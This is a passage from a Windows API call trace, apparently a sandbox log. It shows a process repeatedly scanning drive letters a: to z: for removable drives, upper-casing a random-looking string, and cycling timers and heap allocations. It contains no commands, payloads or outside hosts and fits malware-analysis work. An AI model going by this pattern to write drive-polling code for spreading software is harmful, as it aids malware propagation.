Flags=0x0, Size=0x40) returned 0x1318cc0 [0217.528] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.528] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0217.528] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.528] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2b0 [0217.528] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0217.528] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.528] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.528] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.528] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.528] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.528] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.528] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.529] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.529] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.529] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0217.529] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.529] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.529] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.529] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.529] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.529] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.529] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.530] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.530] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.530] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.553] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.553] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.554] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.554] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.554] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.554] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.554] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.555] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.555] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.555] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.555] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.555] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.556] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.556] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.556] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.556] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.556] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.557] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.557] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.558] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.558] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.558] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0217.558] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.558] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.558] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.558] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.558] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.558] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.558] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.558] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.558] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0217.559] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.559] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.559] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e20 [0217.559] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.559] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e20 | out: hHeap=0x12c0000) returned 1 [0217.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0217.559] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0217.559] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0217.559] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0217.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.560] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.560] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.560] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0217.560] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.560] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.560] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.560] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.560] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0217.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.560] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.560] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.560] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0217.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.560] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0217.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.561] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0217.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.561] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.561] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.561] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.561] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.561] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.562] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.562] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.562] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.562] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.562] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.563] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.563] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.563] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.563] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.563] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.563] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.564] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.564] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.564] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.564] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.565] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.565] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.565] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.565] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.565] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.565] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.566] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.566] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.566] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.566] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.566] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.566] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.566] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0217.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.566] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.566] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0217.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260a0 [0217.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.567] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260a0 | out: hHeap=0x12c0000) returned 1 [0217.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0217.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0217.567] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0217.567] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0217.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0217.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.567] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0217.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.567] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.568] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd370 [0217.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0217.568] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.568] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.568] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.568] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.569] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.569] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0217.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0217.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.569] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.569] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.570] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.570] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.570] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.570] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.570] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.571] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.571] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.571] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.571] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.572] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.572] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.572] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.572] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.573] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.573] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.573] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.573] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.573] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.573] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.574] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.574] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.574] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.574] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.574] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.575] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0217.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0217.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.575] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0217.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326040 [0217.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.576] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326040 | out: hHeap=0x12c0000) returned 1 [0217.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0217.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0217.576] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0217.576] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0217.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.576] HeapFree (in: 